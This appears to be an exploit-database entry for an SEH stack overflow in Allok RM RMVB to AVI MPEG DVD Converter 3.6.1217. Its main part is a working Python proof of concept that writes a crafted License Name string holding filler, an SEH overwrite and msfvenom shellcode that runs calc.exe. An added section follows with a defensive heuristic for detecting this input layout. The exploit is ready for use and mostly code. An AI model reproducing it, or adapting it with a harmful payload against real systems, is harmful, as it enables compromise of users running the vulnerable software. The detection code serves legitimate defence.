"Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)"

Author: antonio

Platform: windows

Release date: 2020-01-13

# Exploit Title: Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)
# Date: 2020-01-12
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: https://www.alloksoft.com
# Software Link: https://www.alloksoft.com/allok_rmconverter.exe
# Version: 3.6.1217
# Tested on: Windows 7 SP1 32-bit

# Copy and paste the contents of poc_seh.txt into the License Name input field
# of Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 to execute calc.exe.

#!/usr/bin/python

nseh_offset = 780
total = 1000

#  msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode_calc CMD=calc.exe EXITFUNC=thread
shellcode_calc =  b""
shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24"
shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31"
shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97"
shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d"
shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01"
shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58"
shellcode_calc += b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52"
shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95"
shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22"
shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73"
shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b"
shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2"
shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92"
shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a"
shellcode_calc += b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74"
shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37"
shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28"
shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60"
shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc"
shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59"
shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4"
shellcode_calc += b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47"

poc = ""
poc += "A"*nseh_offset
poc += "\xEB\x0b\x90\x90"   # jmp forward (nseh)
poc +=  "\x11\x7b\x03\x10"  # pop pop ret (seh)
poc += "\x90"*20
poc += shellcode_calc
poc += "D"*(total - len(poc))

file = open("poc_seh.txt","w")
file.write(poc)
file.close()
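
A triage heuristic for the input layout the PoC above writes (a long filler run, a short-jump next-SEH field, a 4-byte handler pointer, then a NOP sled), useful for flagging suspicious field values or crash samples. This is an added example, not part of the original exploit entry; the function name, the thresholds and the constructed sample bytes (placeholder handler address, inert 0xCC padding instead of a payload) are assumptions.

```python
import re
import struct

NOP = 0x90
SHORT_JMP = 0xEB  # x86 "jmp rel8" opcode, as used in the PoC's next-SEH field


def find_seh_overwrite_layout(data: bytes, min_fill: int = 256, min_nops: int = 8):
    """Return one dict per offset where data matches filler + nSEH + SEH + NOP sled.

    Only repeated-byte filler is recognised; a cyclic-pattern filler is missed.
    """
    hits = []
    filler = re.compile(rb"(.)\1{%d,}" % (min_fill - 1), re.DOTALL)
    for m in filler.finditer(data):
        nseh = m.end()                      # offset of the 4-byte next-SEH field
        record = data[nseh:nseh + 8]        # next-SEH field + handler pointer
        if len(record) < 8 or record[0] != SHORT_JMP or record[1] >= 0x80:
            continue                        # not a forward short jump
        handler = struct.unpack_from("<I", record, 4)[0]
        sled_start = sled_end = nseh + 8
        while sled_end < len(data) and data[sled_end] == NOP:
            sled_end += 1
        target = nseh + 2 + record[1]       # where the short jump lands
        if sled_end - sled_start >= min_nops and sled_start <= target < sled_end:
            hits.append({
                "nseh_offset": nseh,
                "handler": handler,
                "jump_target": target,
                "nop_sled_len": sled_end - sled_start,
            })
    return hits


# Constructed sample with the same shape as poc_seh.txt (offset 780 is from the
# PoC; the handler address and the 0xCC bytes are placeholders, not a payload).
SUSPICIOUS = (b"A" * 780 + b"\xEB\x0b\x90\x90" + struct.pack("<I", 0x11223344)
              + b"\x90" * 20 + b"\xCC" * 32 + b"D" * 160)
# Constructed benign inputs: a normal name, and a long run with no SEH record.
BENIGN_NAME = b"Jane Doe"
BENIGN_LONG = b"A" * 900 + b" trailing text"

if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS), ("name", BENIGN_NAME),
                        ("long", BENIGN_LONG)):
        print(label, find_seh_overwrite_layout(blob))
```
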